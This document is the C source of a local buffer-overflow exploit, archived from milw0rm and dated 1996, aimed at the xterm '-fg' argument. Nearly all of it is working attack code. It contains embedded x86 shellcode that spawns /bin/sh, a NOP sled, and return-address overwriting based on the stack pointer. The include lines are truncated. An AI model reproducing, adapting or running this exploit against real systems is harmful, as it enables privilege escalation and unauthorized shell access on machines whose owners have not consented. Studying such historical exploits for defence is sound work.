#include
#include
#include
#define DEFAULT_OFFSET 0
#define BUFFER_SIZE 1491
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main(int argc, char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
"\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
"\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
"\xeb\x18"
"\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
"\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";
int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;
if(argc>1)
ofs=atoi(argv[1]);
if(argc>2)
bs=atoi(argv[2]);
printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
ofs, get_esp()+ofs, bs);
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, bs-strlen(execshell));
ptr += bs-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}
// milw0rm.com [1996-08-24]
